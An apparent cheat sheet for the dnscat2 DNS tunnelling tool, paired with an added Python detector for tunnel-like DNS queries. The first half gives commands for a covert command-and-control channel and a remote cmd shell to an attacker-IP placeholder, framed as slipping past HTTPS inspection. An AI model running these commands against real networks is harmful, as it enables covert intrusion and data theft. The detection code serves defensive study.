dnscat2
DNS tunneling tool that sends data between two hosts inside DNS TXT records, providing an encrypted command-and-control (C2) channel.
Install (Server)
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
Start Server
sudo ruby dnscat2.rb --dns host=<ATTACKER_IP>,port=53,domain=<DOMAIN> --no-cache
On startup the server prints a pre-shared secret; clients must pass it via --secret (or -PreSharedSecret in PowerShell) to authenticate.
Client (PowerShell)
Clone dnscat2-powershell and transfer dnscat2.ps1 to the target.
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <ATTACKER_IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmd
Client (Native)
./dnscat --secret=<SECRET> <DOMAIN>
Or connect directly without a domain:
./dnscat --dns server=<ATTACKER_IP>,port=53 --secret=<SECRET>
Session Management
| Command | Description |
|---|---|
| windows | List active sessions/windows |
| window -i <id> | Interact with a session |
| kill <id> | Kill a session |
| quit | Exit dnscat2 |
| tunnels | List active tunnels |
| help | Show available commands |
Interactive Shell
dnscat2> window -i 1
Use ctrl-z to return to the dnscat2 prompt.
Notes
- Uses UDP port 53 by default
- All sessions are encrypted when using --secret / -PreSharedSecret
- Useful for environments where HTTPS is stripped/inspected but DNS is allowed out
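The channel described above leaves a recognisable footprint in resolver or query logs: bursts of TXT lookups whose subdomain labels are long, high-entropy data blobs all under one registered domain. The following is an added example of a small detector for that pattern (it is not part of dnscat2 or the dnscat2-powershell project); the log line format `<timestamp> <client> <qtype> <qname>`, the hex-looking labels in the constructed sample, the two-label approximation of the registered domain and the thresholds are all assumptions for illustration.

```python
import math
from collections import Counter

# Constructed sample DNS query log, one query per line:
# "<timestamp> <client> <qtype> <qname>". The format and the data-like
# labels are assumptions for this example, not real or dnscat2-generated traffic.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 10.0.0.5 A www.example.com
2024-01-01T10:00:01Z 10.0.0.5 TXT 8f3a1c4e9b2d7f60a1b2c3d4e5f60718.2a9c.c2.example.net
2024-01-01T10:00:01Z 10.0.0.5 TXT 0b7e6d5c4b3a29181716151413121110.2a9d.c2.example.net
2024-01-01T10:00:02Z 10.0.0.5 TXT fedcba9876543210fedcba9876543210.2a9e.c2.example.net
2024-01-01T10:00:02Z 10.0.0.5 TXT 1234567890abcdef1234567890abcdef.2a9f.c2.example.net
2024-01-01T10:00:03Z 10.0.0.7 TXT _dmarc.example.com
2024-01-01T10:00:04Z 10.0.0.7 A mail.example.com
"""


def shannon_entropy(text):
    """Bits of entropy per character of `text` (0.0 for empty input)."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Approximate the registered domain as the last two labels.
    A public-suffix list would be more accurate; two labels is an assumption here."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def score_query(qtype, qname):
    """Score one query against three tunnelling indicators; return (score, reasons)."""
    labels = qname.rstrip(".").lower().split(".")
    subdomain_labels = labels[:-2]
    reasons = []
    if qtype.upper() == "TXT":
        reasons.append("TXT record type, which can carry arbitrary payload data")
    if subdomain_labels and max(len(label) for label in subdomain_labels) >= 30:
        reasons.append("subdomain label of 30+ characters")
    # Hostnames are words; encoded data looks random. 3.0 bits/char is an assumed cut-off.
    if shannon_entropy("".join(subdomain_labels)) > 3.0:
        reasons.append("high-entropy subdomain")
    return len(reasons), reasons


def parse_line(line):
    """Split one log line into (client, qtype, qname); the timestamp is not needed here."""
    _timestamp, client, qtype, qname = line.split()
    return client, qtype, qname


def analyze(log_text, min_score=2, volume_threshold=3):
    """Count suspicious queries per (client, registered domain) and return the
    pairs at or above `volume_threshold`. A single odd-looking query is noise;
    a steady stream to one domain is the tunnel."""
    counts = Counter()
    for line in log_text.strip().splitlines():
        client, qtype, qname = parse_line(line)
        score, _reasons = score_query(qtype, qname)
        if score >= min_score:
            counts[(client, registered_domain(qname))] += 1
    return {key: n for key, n in counts.items() if n >= volume_threshold}


if __name__ == "__main__":
    for (client, domain), n in analyze(SAMPLE_LOG).items():
        print(f"ALERT {client} sent {n} tunnel-like DNS queries to *.{domain}")
```

Per-query scoring keeps the false-positive rate down: a legitimate `_dmarc` TXT lookup trips only one indicator, whereas a data-carrying query trips all three, and the aggregation step then surfaces only clients that repeatedly query one domain. In production the same logic would run over resolver logs and pair with a block or sinkhole of the flagged domain.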